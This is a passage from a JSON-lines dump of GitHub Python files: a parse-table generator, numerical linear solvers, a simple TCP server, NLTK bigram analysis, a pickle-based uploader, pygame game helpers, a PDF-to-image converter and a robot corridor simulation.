self.__grammarObj.get_grammar_list()\n for eachRule in rules:\n for each in self.__firstObj.get_first_of(eachRule['product'][0]):\n if each == \"EFS\":\n self.__parseTable.append(\n {'variable': eachRule.get('variable'), 'terminal': \"$\", 'product': eachRule.get('product')})\n for eachF in self.__followObj.get_follow_of(eachRule.get('variable')):\n self.__parseTable.append({'variable': eachRule.get('variable'), 'terminal': eachF,\n 'product': eachRule.get('product')})\n\n else:\n self.__parseTable.append(\n {'variable': eachRule.get('variable'), 'terminal': each, 'product': eachRule.get('product')})\n\n self.__parseTable = self.__remove_duplicate(self.__parseTable)\n self.__parseTable.remove({'variable': \"\", 'terminal': \"\", 'product': [[]]})\n\n return self\n\n def print_parse_table(self):\n for each in self.__parseTable:\n print (each)\n return self\n\n def print_to_file(self):\n output = open(\"parseTable.txt\", \"w+\")\n _list = self.__terminalList\n _list.append(\"$\")\n for eachV in self.__variableList:\n output.write(\"-------------------------------------------------------\\n\" + eachV + \"\\n\")\n\n for eachT in _list:\n for eachR in self.__parseTable:\n if not eachR.get('variable') == eachV:\n continue\n if not eachR.get('terminal') == eachT:\n continue\n 
output.write(\"\\t\\t-----------------------------------------------\\n\\t\\t->\" + eachT + \"\\n\\t\\t\\t\\t \")\n for eachS in eachR.get('product'):\n output.write(eachS + \" \")\n output.write(\"\\n\")\n output.write(\"-------------------------------------------------------\")\n output.close()\n\n\nfl = Follow()\n\nfl.get_grammar_object().print_grammar_file()\n\nprint\nprint\n\nfl.get_first_object().print_first()\n\nprint\nprint\n\nfl.print_follow_list()\n\nprint\nprint\n\nParseTable().generate_parse_table().print_parse_table()\nParseTable().generate_parse_table().print_to_file()\n","repo_name":"eendroroy/nrpp","sub_path":"parseTable.py","file_name":"parseTable.py","file_ext":"py","file_size_in_byte":3392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41632497144","text":"import numpy as np\nfrom scipy.sparse import random\nimport scipy.sparse as sparse\nimport matplotlib.pyplot as plt\n\n\n# Question 1\ndef general_iterative_Iter(A, x, b, M, N, weight):\n building_convergence_graph = []\n for i in range(100):\n x = x + weight * np.linalg.inv(M).dot(b - A.dot(x))\n building_convergence_graph.append((i + 1, np.linalg.norm((A.dot(x) - b))))\n # print(np.linalg.norm((A.dot(x) - b)))\n # print(np.linalg.norm((A.dot(x) - b)) / (np.linalg.norm(b)))\n # if ((np.linalg.norm((A.dot(x) - b)) / (np.linalg.norm(b))) < 0.1):\n # pass\n return building_convergence_graph\n\n\ndef jacobi(A, b):\n M = np.eye(A[0].size)\n for i in range(A[0].size):\n M[i][i] = A[i][i]\n N = A - M\n x = np.zeros(A[0].size)\n return (general_iterative_Iter(A, x, b, M, N,0.36))\n\n\ndef gauss_Seid(A, b):\n M = np.eye(A[0].size)\n for i in range(A[0].size):\n for j in range(A[0].size):\n if (j >= i):\n M[i][j] = A[i][j]\n N = A - M\n x = np.zeros(A[0].size)\n return (general_iterative_Iter(A, x, b, M, N, 1))\n\n\ndef gradient_descent(A, b):\n x = np.zeros(A[0].size)\n building_convergence_graph = []\n r = b - A.dot(x)\n for i in range(100):\n # print(x)\n alpha = (r.transpose().dot(r)) / (r.transpose().dot(A.dot(r)))\n x = x + alpha * r\n r = b - A.dot(x)\n building_convergence_graph.append((i + 1, np.linalg.norm(r)))\n # if r.transpose().dot(r) < 0.0001:\n # if ((np.linalg.norm((A.dot(x) - b)) / (np.linalg.norm(b))) < 0.001):\n # pass\n return building_convergence_graph\n\n\ndef conjugate_Gradient(A, b):\n x = np.zeros(A[0].size)\n building_convergence_graph = []\n r = b - A.dot(x)\n p = r\n for i in range(100):\n alpha = (r.transpose().dot(r)) / (p.transpose().dot(A.dot(p)))\n x_old = x\n x = x + alpha * p\n old_r = r\n r = b - A.dot(x)\n # if r.transpose().dot(r) < 0.0001:\n beta = (r.transpose().dot(r)) / (old_r.transpose().dot(old_r))\n p = r + beta * p\n building_convergence_graph.append((i + 1, np.linalg.norm(r)))\n return building_convergence_graph\n\n\ndef graphs(A, b):\n graph_points_jacobi = jacobi(A, b)\n graph_points_gauss_Seid = gauss_Seid(A, b)\n graph_points_gradient_descent = gradient_descent(A, b)\n graph_points_conjugate_Gradient = conjugate_Gradient(A, b)\n\n x = [i + 1 for i in range(100)]\n\n y_jacobi = [i[1] for i in graph_points_jacobi]\n build_graph_residual(x, y_jacobi, \"Jacobi method residual\")\n y_gauss_Seid = [i[1] for i in graph_points_gauss_Seid]\n build_graph_residual(x, y_gauss_Seid, \"gauss_Seid method residual\")\n y_gradient_descent = [i[1] for i in graph_points_gradient_descent]\n build_graph_residual(x, y_gradient_descent, \"gradient_descent method residual\")\n y_conjugate_Gradient = [i[1] for i in 
graph_points_conjugate_Gradient]\n build_graph_residual(x, y_conjugate_Gradient, \"conjugate_Gradient method residual\")\n\n build_graph_convergence_rate(x, y_jacobi, \"Jacobi method convergence rate\")\n build_graph_convergence_rate(x, y_gauss_Seid, \"gauss_Seid_residual method convergence rate\")\n build_graph_convergence_rate(x, y_gradient_descent, \"gradient_descent method convergence rate\")\n build_graph_convergence_rate(x, y_conjugate_Gradient, \"conjugate_Gradient method convergence rate\")\n\n\ndef build_graph_residual(x, y, name):\n plt.xlabel('iter num')\n plt.ylabel('residual')\n\n plt.title(name)\n\n plt.semilogy(x, y, label='Residual')\n plt.legend()\n plt.show()\n pass\n\n\ndef build_graph_convergence_rate(x, y, name):\n plt.xlabel('iter num')\n plt.ylabel('ratio')\n\n plt.title(name)\n\n for i in range(len(y) - 1):\n y[i] = y[i + 1] / y[i]\n y[len(y)-1] = y[len(y)-2]\n plt.plot(x, y, label='Convergence rate')\n plt.legend()\n plt.show()\n\n\ndef main():\n n = 256\n A = random(n, n, 5 / n, dtype=float)\n v = np.random.rand(n)\n v = sparse.spdiags(v, 0, v.shape[0], v.shape[0], 'csr')\n A = A.transpose() * v * A + 0.1 * sparse.eye(n)\n A = A.toarray()\n b = np.random.rand(256, 1)\n # print(gauss_Seid(A,b))\n # print(gradient_descent(A,b))\n # print(conjugate_Gradient(A,b))\n graphs(A, b)\n\n\nif __name__ == '__main__':\n main()\n\n# #Question 3 Section C\n# def gradient_descent(A, b):\n# x = np.zeros(A[0].size)\n# r = b - A.dot(x)\n# for i in range(100):\n# print(x)\n# alpha = (r.transpose().dot(r)) / (r.transpose().dot(A.dot(r)))\n# x = x + alpha * r\n# r = b - A.dot(x)\n# # if r.transpose().dot(r) < 0.0001:\n# if ((np.linalg.norm((A.dot(x) - b)) / (np.linalg.norm(b))) < 0.001):\n# return x\n# break\n# check for question 1.a\n# A = np.array([[2, 1, 2], [1, 7, 1], [1, 2, 3]])\n# AA=A.transpose()@A\n# print(AA@np.array([1,2,3]))\n# b = np.array([10, 18, 14])\n# bb= np.array([52, 164, 80])\n#\n","repo_name":"Nivhaham/Optimization_methods","sub_path":"ass2/Section_1.py","file_name":"Section_1.py","file_ext":"py","file_size_in_byte":4943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"16806048804","text":"from socket import *\n\n\n# 创建套接字\nprepare = socket(AF_INET, SOCK_STREAM)\n# 绑定服务端地址\nprepare.bind(('0.0.0.0', 8888))\n# 设置监听套接字\nprepare.listen(5)\n# 等待客户端链接\nprint('Waiting for input...')\nuser_input, add = prepare.accept()\n# 消息收发\n# 设置传入字符的长度\ndata = user_input.recv(2048) # 此处输出位字节串\n# 转换为字符串\nprint(data.decode(), add)\n\n# 返回客户端信息\nn = user_input.send(b'Already get your message')\n# 关闭套接字\nprepare.close()\nuser_input.close()\n","repo_name":"demo112/1807","sub_path":"PythonNet/day01/teach_day1/TCP_SERVER/self_work.py","file_name":"self_work.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"4300010089","text":"import nltk\nnltk.download('stopwords')\nfrom nltk import bigrams\nfrom nltk.probability import FreqDist, ConditionalFreqDist\nfrom nltk.corpus import stopwords\n\nclass CriticalAnalysis:\n def Score(listIs):\n initial = \"\"\n\n for paper in listIs:\n if paper['abstract'] != None:\n initial += paper['abstract']\n\n initial = initial.lower()\n initial = initial.replace('-', '')\n initial = initial.replace('.', '')\n initial = initial.replace(',', '')\n\n # Prepare the text data\n \n word_tokens = initial.split(' ')\n\n stop_words = set(stopwords.words('english'))\n\n filtered_sentence = [w for w in 
word_tokens if not w.lower() in stop_words]\n\n text = ' '.join(filtered_sentence)\n # Convert the text into a list of words\n words = nltk.word_tokenize(text)\n\n # Generate the bigrams from the words\n bigram_list = list(bigrams(words))\n\n # Create a frequency distribution of the bigrams\n bigram_freq = FreqDist(bigram_list)\n\n # Create a conditional frequency distribution of the bigrams\n bigram_cond_freq = ConditionalFreqDist([(w1, w2) for w1, w2 in bigram_list])\n\n # Calculate the probability of a word giv0en its previous word\n listIs = text.split(' ')\n dict_prob = {}\n for i in range(len(listIs)-1):\n if(text.count(listIs[i]) > 6 and len(listIs[i]) > 3 and bigram_cond_freq[listIs[i]].freq(listIs[i+1]) != 1):\n dict_prob[f\"{listIs[i]} {listIs[i+1]}\"] = bigram_cond_freq[listIs[i]].freq(listIs[i+1])\n\n dict_prob = list(sorted(dict_prob.items(), key = lambda kv: (kv[1]), reverse=True))\n listIs = []\n for i in range(10):\n listIs.append(dict_prob[i][0])\n return {\"queryparams\": listIs}\n","repo_name":"iSmart-Research-Scholar/CriticalAnalysis","sub_path":"CriticalAnalysis/CriticalAnalysis.py","file_name":"CriticalAnalysis.py","file_ext":"py","file_size_in_byte":2004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"9258099790","text":"import controller\nimport pickle\nimport os\n\nclass PersistUploader:\n def __init__(self, picklefile=os.path.join(\"persist_data\", \"persist_picklefile\")):\n self.filename = picklefile\n self.controller = controller.MockedUploaderController()\n\n def add_new_item(self, item):\n with open(self.filename, \"ab\") as fp:\n pickle.dump(item, fp)\n\n def load_items(self):\n data = []\n if os.path.exists(self.filename):\n with open(self.filename, 'rb') as fr:\n try:\n while True:\n data.append(pickle.load(fr))\n except EOFError:\n pass\n\n return data\n\n def upload_items(self):\n items = self.load_items()\n print(f\"{len(items)} items were set to be monitored for uploading.\"\n f\" checking if items were modified and updating if required.\")\n\n uploaded_items = []\n for item in items:\n src = item[\"Source_folder\"]\n dest = item[\"Destination_bucket\"]\n regex = item[\"Regex\"]\n item_tuple = (src, dest, regex)\n if item_tuple not in uploaded_items:\n self.controller.upload_item(item, \"celery\")\n uploaded_items.append(item_tuple)\n else:\n print(f\"{item_tuple} already uploaded in this interval\")\n","repo_name":"llivne/ultima","sub_path":"persist.py","file_name":"persist.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1694928070","text":"from turtle import window_height\nimport pygame\nimport os\n\nimport asyncio\n\nimport types\n\nimport time\n\nFPS = 60\n\nWIN_WIDTH, WIN_HEIGHT = 1920, 1080\n\n\n#----DECK----#\nDECK_SIZE = 30\n\n\n#----HOVER----#\nHOVER_RATIO = 1.5\n\n#----CARD DIMENSIONS----#\nCARD_WIDTH, CARD_HEIGHT = 600, 800\n#HAND\nRATIO_HAND = 3/10\nCARD_WIDTH_HAND, CARD_HEIGHT_HAND = CARD_WIDTH*RATIO_HAND, CARD_HEIGHT*RATIO_HAND\n\n#DECK_BUILD\nFULL_RES_RATIO = 2.5\n\n\n#----MULLIGAN----#\nMULLIGAN_X, MULLIGAN_Y = 100, 100\n\nMULLIGAN_RATIO = 2\nCARD_WIDTH_MULLIGAN, CARD_HEIGHT_MULLIGAN = CARD_WIDTH_HAND * MULLIGAN_RATIO, CARD_HEIGHT_HAND * MULLIGAN_RATIO\n\n\n#----HAND----#\nMAX_HAND_SIZE = 10\n\nHAND_SPACING = CARD_WIDTH_HAND / 3\n\nHAND_X, HAND_Y0, HAND_Y1 = 40, 1080 - CARD_HEIGHT_HAND, 0\nHAND_Y = HAND_Y0, HAND_Y1\n\n\n#----DRAG----#\nDRAG_FROM_HAND = 
1\nDRAG_FROM_FIELD = 2\n\n\n#----FIELD----#\nMAX_FIELD_SIZE = 8\n\nFIELD_WIDTH, FIELD_HEIGHT = CARD_WIDTH_HAND * MAX_FIELD_SIZE, CARD_HEIGHT_HAND * 2\n\nFIELD_X, FIELD_Y = 200, [300 + CARD_HEIGHT_HAND, 300]\n\nFIELD_SPACING = CARD_WIDTH_HAND # + CARD_WIDTH_HAND/2\n\n\n#----BUTTONS----#\nEND_TURN_WIDTH, END_TURN_HEIGHT = 100, 25\n\nCONFIRM_WIDTH, CONFIRM_HEIGHT = 800, 200\nCONFIRM_X, CONFIRM_Y = WIN_WIDTH / 2 - CONFIRM_WIDTH / 2, WIN_HEIGHT - CONFIRM_HEIGHT\n\n\n#----MISC----#\nDECK_WIDTH, DECK_HEIGHT = 180, 240\nDECK_X, DECK_Y = 1920 - DECK_WIDTH, [1080 - DECK_HEIGHT, 0]\n\n#----STATS----#\nCOST, ATK, HP = 0, 1, 2\n\n\n#----PLAYER----#\nPLAYER_FRAME_WIDTH, PLAYER_FRAME_HEIGHT = 240, 300\nPLAYER_FRAME_X, PLAYER_FRAME_Y = DECK_X - PLAYER_FRAME_WIDTH, [1080 - PLAYER_FRAME_HEIGHT, 0]\n\nPLAYER_CARD_OFFSET_X, PLAYER_CARD_OFFSET_Y = -30, [ - CARD_HEIGHT_HAND * HOVER_RATIO, CARD_HEIGHT_HAND * HOVER_RATIO]\n\n\n#--DRINKS--#\nDRINK_WIDTH, DRINK_HEIGHT = 30, 30\nDRINK_START_X, DRINK_START_Y = PLAYER_FRAME_X - DRINK_WIDTH, [1080 - DRINK_HEIGHT, 0]\nDRINK_TOTAL_START_X = DRINK_START_X - 115\n\nDRINK_TEXT_HEIGHT = 45\nDRINK_TOTAL_START_Y = [1080 - DRINK_TEXT_HEIGHT, 0]\n\nMAX_DRINKS = 10\n\n\n#----HISTOGRAM----#\nHIST_WIDTH, HIST_HEIGHT = 30, 30\nHIST_X_SPACER = 60\nHIST_X, HIST_Y = 500, WIN_HEIGHT - 60\n\n\n#----CHANNEL POINTS----#\nPOINTS_PER_DRAW = 100\nPOINTS_PER_HP = 200\nPOINTS_PER_ATK = 100\n\n\n\ndef load_image(local_dir, w, h):\n img = pygame.image.load(os.path.join(\"Assets\", local_dir))\n return pygame.transform.smoothscale(img, (w, h))\n\n\ndef draw_card(app, card, ratio = 1, custom_x = None, custom_y = None, alpha = None, nostat = False, from_hand = False):\n '''draw a card on the window, with optional ratio'''\n\n if not card.animating:\n #update img\n card.img = pygame.transform.smoothscale(card.fullresimg, (CARD_WIDTH_HAND*ratio, CARD_HEIGHT_HAND*ratio))\n if alpha:\n card.img.set_alpha(alpha)\n\n #if no custom coords given, draw at object position\n if not custom_x:\n pos = card.pos.copy()\n\n #otherwise draw at custom position\n else:\n pos = [custom_x, custom_y]\n\n \n #----BORDERS----#\n\n #draw mulligan select\n if card.mulligan:\n img = pygame.transform.smoothscale(app.highlight_img_fullres, (CARD_WIDTH_HAND*ratio, CARD_HEIGHT_HAND*ratio))\n if alpha:\n img.set_alpha(alpha)\n app.WIN.blit(img, pos)\n\n \n \n\n #draw highlight\n if (card.energy > 0 and card.stats[ATK] > 0) or card.playable:\n img = pygame.transform.smoothscale(app.highlight_img_fullres, (CARD_WIDTH_HAND*ratio, CARD_HEIGHT_HAND*ratio))\n if alpha:\n img.set_alpha(alpha)\n app.WIN.blit(img, pos)\n\n #draw stuck\n if card.stuck:\n img = pygame.transform.smoothscale(app.stuck_img_fullres, (CARD_WIDTH_HAND*ratio, CARD_HEIGHT_HAND*ratio))\n if alpha:\n img.set_alpha(alpha)\n app.WIN.blit(img, pos)\n\n #draw limbo highlight\n if card == app.limbo:\n #draw self.limbo border\n img = pygame.transform.smoothscale(app.limbo_img_fullres, (CARD_WIDTH_HAND*ratio, CARD_HEIGHT_HAND*ratio))\n if alpha:\n img.set_alpha(alpha)\n app.WIN.blit(img, pos)\n\n \n\n #draw card itself\n app.WIN.blit(card.img, pos)\n\n\n #draw steadfast\n if card.steadfast:\n img = pygame.transform.smoothscale(app.steadfast_img_fullres, (CARD_WIDTH_HAND*ratio, CARD_HEIGHT_HAND*ratio))\n if alpha:\n img.set_alpha(alpha)\n app.WIN.blit(img, pos)\n\n #draw stats\n if not nostat:\n if ratio == MULLIGAN_RATIO:\n draw_stats(app, card, pos, mulligan = ratio, alpha = alpha)\n\n else:\n draw_stats(app, card, pos, alpha = alpha)\n\n #draw shield\n if card.shield:\n 
img = pygame.transform.smoothscale(app.shield_img_fullres, (CARD_WIDTH_HAND*ratio, CARD_HEIGHT_HAND*ratio))\n\n if alpha:\n img.set_alpha(alpha)\n\n app.WIN.blit(img, pos)\n\n\n\ndef draw_stats(app, card, pos, build = None, mulligan = None, alpha = None, from_hand = False):\n for stat, val in enumerate(card.stats):\n\n #if stat is blank, skip\n if val == \"\":\n continue\n\n if card.hover:\n # print(from_hand)\n ratio = HOVER_RATIO\n\n if not card.played:\n if card.owner:\n x_offset0 = -9\n y_offset0 = 25\n x_offset1 = -15\n y_offset1 = 40\n x_offset2 = 63\n y_offset2 = y_offset1\n\n else:\n x_offset0 = -9\n y_offset0 = -50\n x_offset1 = -15\n y_offset1 = 120\n x_offset2 = 63\n y_offset2 = y_offset1\n\n \n else:\n x_offset0 = -9\n y_offset0 = -17\n x_offset1 = -15\n y_offset1 = 77\n x_offset2 = 63\n y_offset2 = y_offset1\n\n \n elif build:\n ratio = build\n\n x_offset0 = 30\n y_offset0 = 50\n x_offset1 = 25\n y_offset1 = -40\n x_offset2 = -20\n y_offset2 = -40\n\n \n elif mulligan:\n ratio = mulligan\n\n x_offset0 = 23\n y_offset0 = 30\n x_offset1 = 16\n y_offset1 = 33\n x_offset2 = 32\n y_offset2 = y_offset1\n\n\n else:\n ratio = 1\n\n x_offset0 = 15\n y_offset0 = 10\n x_offset1 = 10\n y_offset1 = 45\n x_offset2 = 40\n y_offset2 = 50\n\n if stat == 0:\n x = card.pos[0] + (x_offset0) * ratio\n y = card.pos[1] + (y_offset0) * ratio\n\n #for drawing owner label\n owner_label_x = x\n owner_label_y = y\n \n elif stat == 1:\n x = card.pos[0] + (x_offset1) * ratio\n y = card.pos[1] + (CARD_HEIGHT_HAND - y_offset1) * ratio\n\n elif stat == 2:\n x = card.pos[0] + (CARD_WIDTH_HAND - x_offset2) * ratio\n y = card.pos[1] + (CARD_HEIGHT_HAND - y_offset2) * ratio\n\n if alpha:\n card.statsimgs[stat].set_alpha(alpha)\n\n else:\n card.statsimgs[stat].set_alpha(255)\n\n app.WIN.blit(card.statsimgs[stat], (x, y))\n\n #draw owner label\n #generate image from font\n colour = (255,255,255)\n chat_owner_img = app.chat_owner_font.render(card.chat_owner, True, colour)\n app.WIN.blit(chat_owner_img, (owner_label_x, owner_label_y))\n\n\ndef hover_card(card, ratio, if_hand = False):\n '''enlarge a card, primarily while mouse is hovering over it'''\n\n #make card look centered compared to unhovered image center\n x = card.pos[0] - (CARD_WIDTH_HAND*ratio - CARD_WIDTH_HAND) / 2\n\n if not if_hand:\n y = card.pos[1] - (CARD_HEIGHT_HAND*ratio - CARD_HEIGHT_HAND) / 2\n else:\n y = card.pos[1] - (1 - card.owner) * (CARD_HEIGHT_HAND*ratio - CARD_HEIGHT_HAND)\n\n # y = card.pos[1] - (CARD_HEIGHT_HAND*ratio - CARD_HEIGHT_HAND) / 2\n\n return [x, y]\n\n\ndef update_cardpos(card, x, y):\n card.pos[0] = x\n card.pos[1] = y\n card.rect.update(card.pos, (CARD_WIDTH_HAND, CARD_HEIGHT_HAND))\n\n\ndef set_targets(app, vals = None):\n\n #if no custom vals given, just reset targets\n if not vals:\n #friendly cards targetable\n app.fcard = 1\n #enemy cards untargetable\n app.ecard = 0\n #player targetable\n app.pcard = 1\n\n else:\n app.fcard = vals[0]\n app.ecard = vals[1]\n app.pcard = vals[2]\n\n\ndef heal_target(app, dmg, card = None, player = None):\n '''heal a target player or card, return true if healing was done or false if card wasn't even damaged'''\n healed = False\n if card:\n #calculate hp difference\n difference = card.statsbase[HP] - card.stats[HP]\n\n if difference > 0:\n dmg = min(dmg, difference)\n card.update_stats(HP, dmg, app.font)\n\n healed = True\n\n else:\n pass\n\n elif player:\n #calculate hp difference\n difference = player.hpbase - player.hp\n\n if difference > 0:\n dmg = min(dmg, difference)\n 
player.update_hp(dmg, app.font)\n\n healed = True\n\n else:\n pass\n\n return healed\n\n\nasync def add_points(app, viewer, amount):\n '''add SE channel points through stream'''\n #award points to viewer who owns card\n await app.chan.send(f\"!addpoints {viewer} {amount}\")","repo_name":"MichaelBong420/TCGShare","sub_path":"_helper_functions.py","file_name":"_helper_functions.py","file_ext":"py","file_size_in_byte":9410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"19120452041","text":"# coding:utf-8\nfrom wand.image import Image\nimport os\n\n# 将pdf文件转为jpg图片文件\n# ./PDF_FILE_NAME 为pdf文件路径和名称\nfiledir = '/home/xu-p/PycharmProjects/pdf2img/data'\nsavedir = '/home/xu-p/PycharmProjects/pdf2img/result'\nlist = os.listdir(filedir)\nfor i in range(0,len(list)):\n filename = os.path.join(filedir,list[i])\n if os.path.isfile(filename):\n _savedir = os.path.join(savedir,list[i])\n if os.path.exists(_savedir):\n continue\n os.mkdir(_savedir)\n image_pdf = Image(filename=filename, resolution=300)\n image_jpeg = image_pdf.convert('jpg')\n\n # wand已经将PDF中所有的独立页面都转成了独立的二进制图像对象。我们可以遍历这个大对象,并把它们加入到req_image序列中去。\n req_image = []\n for img in image_jpeg.sequence:\n img_page = Image(image=img)\n req_image.append(img_page.make_blob('jpg'))\n\n # 遍历req_image,保存为图片文件\n i = 0\n for img in req_image:\n saveFileName = str(i) + '.jpg'\n savepath = os.path.join(_savedir,saveFileName)\n ff = open(savepath, 'wb')\n ff.write(img)\n ff.close()\n i += 1","repo_name":"panxu18/doc-dewraping","sub_path":"dataprovide/pdf2img.py","file_name":"pdf2img.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74809979450","text":"\nimport pygame\nscreenW, screenH = (700, 500)\nscreen = pygame.display.set_mode((screenW, screenH))\n\nimport sys\nsys.path.append(\"C:\\\\Users\\\\Luke\\\\Documents\\\\Learning Python\\\\\")\nimport LukeLibrary as LL\n\nfrom random import randint\n\nfrom math import pi, cos, sin, atan2, exp\n\nrobotTurnRate = 0.1 # \nrobotSpeed = 1 # How fast the robot moves through the corridor\ncorridorWidth = screenH * 0.5 # How wide the corridor is\ncorridorSegmentCount = 8 # The number of corridor segments before looping\nnoiseLength = int(corridorSegmentCount * robotSpeed) # The number of values in the noise list\ncorridorStartYNoise = LL.generate1DNoise(noiseLength, noiseScale=1.0, precisionDP=4, noiseMin=0.0, noiseMax=1.0, smooth=False) # \n# corridorStartYNoise = [LL.randomFloat(0.1, 0.9) for _ in range(noiseLength)]\nnoiseMax = max(corridorStartYNoise)\nnoiseMin = min(corridorStartYNoise)\nnoiseRange = noiseMax - noiseMin\n\n# print(f\"noise: {corridorStartYNoise}\")\n\nclass Wall:\n def __init__(self, side, startNoiseIndex):\n self.side = side\n self.start = LL.Vector()\n self.end = LL.Vector()\n self.colour = (0,0,0) # (randint(0, 255), randint(0, 255), randint(0, 255))\n self.noiseIndex = startNoiseIndex\n\n self.setStartEnd()\n \n def setStartEnd(self, firstCall=True):\n\n startY = screenH * corridorStartYNoise[self.noiseIndex]\n endY = screenH * corridorStartYNoise[(self.noiseIndex+1) % noiseLength]\n\n dx = screenW\n dy = endY - startY\n angle = atan2(dy, dx)\n # print(f\"side:{self.side}, dx:{dx}, dy:{dy}, angle:{angle}\")\n\n leftWallMid = LL.Vector(\n (screenW/2) + (cos(angle-(pi/2)) * corridorWidth * 0.5),\n (screenH/2) + (sin(angle-(pi/2)) * corridorWidth * 0.5)\n )\n\n rightWallMid = LL.Vector(\n (screenW/2) + (cos(angle+(pi/2)) * 
corridorWidth * 0.5),\n (screenH/2) + (sin(angle+(pi/2)) * corridorWidth * 0.5)\n )\n\n wallWidth = screenW * 0.3\n wallHeight= screenH * 0.3\n\n if self.side == 'L':\n self.start = LL.Vector(\n leftWallMid.x - (cos(angle) * wallWidth),\n leftWallMid.y - (sin(angle) * wallHeight)\n )\n self.end = LL.Vector(\n leftWallMid.x + (cos(angle) * wallWidth),\n leftWallMid.y + (sin(angle) * wallHeight)\n )\n elif self.side == 'R':\n self.start = LL.Vector(\n rightWallMid.x - (cos(angle) * wallWidth),\n rightWallMid.y - (sin(angle) * wallHeight)\n )\n self.end = LL.Vector(\n rightWallMid.x + (cos(angle) * wallWidth),\n rightWallMid.y + (sin(angle) * wallHeight)\n )\n \n if firstCall:\n self.start.add(LL.Vector(screenW * self.noiseIndex))\n self.end.add(LL.Vector(screenW * self.noiseIndex))\n else:\n self.start.add(LL.Vector(screenW * 1))\n self.end.add(LL.Vector(screenW * 1))\n \n def move(self):\n \n movementVector = LL.Vector(-robotSpeed, 0)\n self.start.add(movementVector)\n self.end.add(movementVector)\n if self.end.x < 0:\n self.noiseIndex = (self.noiseIndex + 2) % noiseLength\n self.setStartEnd(False)\n # self.start.add(LL.Vector(screenW*2))\n # self.end.add(LL.Vector(screenW*2))\n\n # newIndex = (self.noiseIndex + 1) % noiseLength\n # self.__init__(self.side, newIndex)\n \n def render(self, renderColour=(100,100,100), renderThickness=4):\n x1 = int(self.start.x)\n y1 = int(self.start.y)\n x2 = int(self.end.x)\n y2 = int(self.end.y)\n pygame.draw.line(\n screen, self.colour, #renderColour,\n (x1, y1), (x2, y2),\n renderThickness\n )\n\nWalls = [\n Wall('L', 0),\n Wall('R', 0),\n\n Wall('L', 1),\n Wall('R', 1)\n]\n\nclass Robot:\n def __init__(self, startFacingDirection):\n self.position = LL.Vector(screenW * 0.1, screenH * 0.5)\n self.facingDir = startFacingDirection\n\n self.radius = int(corridorWidth * 0.1)\n \n self.sensorCount = 10 # 20\n self.sensorAngle = pi * 0.75 # 0.5\n\n # self.sensorCount = 10\n # self.sensorAngle = pi * (exp(-(self.sensorCount-1.2)) + 0.65)\n\n self.sensors = [LL.Sensor() for _ in range(self.sensorCount)]\n self.updateSensors()\n\n def updateSensors(self):\n posX = int(self.position.x)\n posY = int(self.position.y)\n\n for sensor in range(self.sensorCount):\n angle = self.facingDir - (self.sensorAngle / 2) + ((self.sensorAngle / (self.sensorCount-1)) * sensor)\n sensorX = posX + (cos(angle) * self.radius)\n sensorY = posY + (sin(angle) * self.radius)\n self.sensors[sensor].update(LL.Vector(sensorX, sensorY), angle)\n self.sensors[sensor].measure(Walls)\n \n def steer(self):\n # sensorReadings = [sensor.measuredDistance for sensor in self.sensors]\n # minReading = min(sensorReadings)\n\n # sensorReadingMultipliers = [\n # sensorReadings[s] / minReading\n # for s in range(self.sensorCount)\n # ]\n\n # sC = 5\n # 0, 1, 2, 3, 4\n # (sC-1)/2 = 2.0\n # -2, -1, 0, 1, 2\n \n # sC = 8\n # 0, 1, 2, 3, 4, 5, 6, 7\n # (sC-1)/2 = 3.5\n # -3.5, -2.5, -1.5, -0.5, 0.5, 1.5, 2.5, 3.5\n\n # sC = 12\n # 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11\n # (sC-1)/2 = 5.5\n # -5.5, -4.5, -3.5, -2.5, -1.5, -0.5, 0.5, 1.5, 2.5, 3.5, 4.5, 5.5\n\n directionVectorList = []\n for s in range(self.sensorCount):\n \n angle = self.facingDir - (self.sensorAngle / 2) + ( (self.sensorAngle / (self.sensorCount-1)) * s )\n \n steeringVector = LL.Vector().fromAngle(angle)\n steeringVector.mult(self.sensors[s].measuredDistance**2)\n directionVectorList.append(steeringVector)\n \n averageVector = LL.Vector().sum(directionVectorList, True)\n\n directionDiff = averageVector.heading() - self.facingDir\n self.facingDir 
+= (directionDiff * robotTurnRate)\n\n \n def move(self):\n self.position.y += (sin(self.facingDir) * robotSpeed)\n\n if self.position.y <= -self.radius:\n self.position.y = screenH + self.radius\n elif self.position.y > screenH + self.radius:\n self.position.y = -self.radius\n \n def render(self, fillColour=(150,150,150), outlineColour=(0,0,0), outlineThickness=2):\n x1 = int(self.position.x)\n y1 = int(self.position.y)\n pygame.draw.circle(\n screen, fillColour,\n (x1, y1), self.radius,\n 0\n )\n pygame.draw.circle(\n screen, outlineColour,\n (x1, y1), self.radius,\n outlineThickness\n )\n\n x2 = int( x1 + (cos(self.facingDir) * self.radius) )\n y2 = int( y1 + (sin(self.facingDir) * self.radius) )\n pygame.draw.line(\n screen, outlineColour,\n (x1, y1), (x2, y2),\n outlineThickness\n )\n\n for sensor in self.sensors:\n sensor.render(screen, thickness=outlineThickness)\n \nrobot = Robot(0.0)\n\n\nwhile(True):\n screen.fill((255, 255, 255))\n\n for ev in pygame.event.get():\n if ev.type == pygame.MOUSEBUTTONUP:\n mouseX, mouseY = pygame.mouse.get_pos()\n dx = mouseX - robot.position.x\n dy = mouseY - robot.position.y\n angle = atan2(dy, dx)\n robot.facingDir = angle\n\n for w in Walls:\n w.move()\n w.render()\n \n robot.updateSensors()\n robot.steer()\n robot.move()\n robot.render()\n\n pygame.display.flip()","repo_name":"Dowzer721/vsCode-Sync","sub_path":"Route Navigation/Corridor/corridor_v1.1.py","file_name":"corridor_v1.1.py","file_ext":"py","file_size_in_byte":7868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} 